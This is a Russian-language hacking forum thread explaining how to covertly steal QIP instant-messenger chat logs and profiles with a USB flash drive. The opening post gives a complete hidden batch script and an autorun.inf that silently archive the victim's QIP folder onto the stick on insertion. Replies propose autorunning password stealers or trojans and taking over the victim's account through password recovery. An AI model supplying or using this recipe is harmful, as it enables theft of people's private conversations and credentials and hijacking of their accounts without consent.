Форум АНТИЧАТ - Как с помощью USB Flash украсть логи QIP ?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- ICQ (https://forum.antichat.xyz/forumdisplay.php?f=13)

- - Как с помощью USB Flash украсть логи QIP ? (https://forum.antichat.xyz/showthread.php?t=113095)

Как с помощью USB Flash украсть логи QIP ?

http://www.technoweek.ru/images/publ...2/flash_L1.jpg

Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом

@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul

где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul

2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"

3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR

4 Создаем папку с названием 123

5 Поместить это все 4 файла в корень флешки и сделать скрытыми.

PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится

источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html

PS:По моему интересный способ.

================================================== ===========
Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:

@Echo off
c:
chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
g:\rar.exe a -r users > nul
copy Profiles.rar g:\123 > nul
del Profiles.rar > nul

видео

Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
Ну и еще одно но - пользователи TotalCommander'a пролетают...

Цитата:

Сообщение от Dr.Gonzo

или, уж что там мелочиться, троян сразу.

Антивирус ругаться начнет.

баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте

Цитата:

Сообщение от HellXi

стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.

зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева:D

ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду ;)

путь логов теперь тут
C:\Documents and Settings\Admin\Application Data\QIP\Profiles

из-за частых вопросов снял видео.

согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)